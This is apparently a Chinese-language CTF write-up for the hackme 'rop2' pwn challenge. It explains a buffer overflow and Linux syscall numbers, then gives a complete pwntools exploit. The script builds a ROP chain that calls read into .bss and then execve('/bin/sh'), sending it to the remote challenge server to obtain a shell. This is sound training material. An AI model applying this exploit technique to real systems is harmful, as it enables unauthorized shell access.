hackme pwn rop2 [syscall + rop]

先checksec一下:

有个大概思路:rop过NX

main中和overflow函数里都有syscall函数,如下:

观察到这里有缓冲区溢出!"A" * 0xC!

先来学习syscall函数:

syscall(int arg1, ……),为可变参数的函数,第一个参数为系统调用号,用以下命令查询:

cat -n /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep "__NR_"
     4	#define __NR_restart_syscall 0
     5	#define __NR_exit 1
     6	#define __NR_fork 2
     7	#define __NR_read 3
     8	#define __NR_write 4
     9	#define __NR_open 5
    10	#define __NR_close 6
    11	#define __NR_waitpid 7
    12	#define __NR_creat 8
    13	#define __NR_link 9
    14	#define __NR_unlink 10
    15	#define __NR_execve 11
    16	#define __NR_chdir 12
    17	#define __NR_time 13
……

拿__NR_read 3举例,表示ID = 3时,调用的是read函数

SYSCALL_DEFINE3(read, unsigned int fd, char* buf, size_t count)

fd为系统描述符,fd=0时表示标准输入,从键盘输入读取,buf为缓冲区,count为长度

拿__NR_write 4举例,表示ID = 4时,调用的是write函数(和read类似)

_syscall3(int write,int fd,const char * buf,off_t count)

我们看到,execve函数的ID为11,当执行execve(“/bin//sh”,NULL,NULL)即成功。

所以,我们的目标是:

(1)将"/bin/sh"写入

(2)利用syscall,调用ID=11的execve

所以gadgets链表为:syscall(3, bss, 0, 8) - syscall(11, bss, 0, 0),然后在输入"/bin/sh"

细节1:

找gadgets是在函数__libc_csu_init中,需要几个参数就从第几个开始

细节2:

当发现程序没有开启PIE时,需要哪些地址的值,都是可以在IDA中扣出来这些地址滴

#!/usr/bin/env python
# coding=utf-8

from pwn import *

#io = process("./rop2")
io = remote("hackme.inndy.tw", 7703)

p4r = 0x08048578
syscall_addr = 0x08048320
bss_addr = 0x0804A020

#elf = ELF("./rop2")
#syscall_addr = elf.symbols["syscall"]
#bss_addr = elf.bss()

io.recvuntil("ropchain:")
payload = "A" * 0xC + "B" * 4
payload += p32(syscall_addr) + p32(p4r) + p32(3) + p32(0) + p32(bss_addr) + p32(8)
payload += p32(syscall_addr) + p32(0xABCD) + p32(11) + p32(bss_addr) + p32(0) + p32(0)

#payload = fit({0xC+0x4: [p32(syscall_addr), p32(p4r), p32(3), p32(0), p32(bss_addr), p32(8)]})
#payload += fit({0x0, [p32(syscall_addr), p32(0xABCD), p32(11), p32(bss_addr), p32(0), p32(0)]})

io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()

 

全部评论

相关推荐

评论
点赞
1
分享
牛客网
牛客企业服务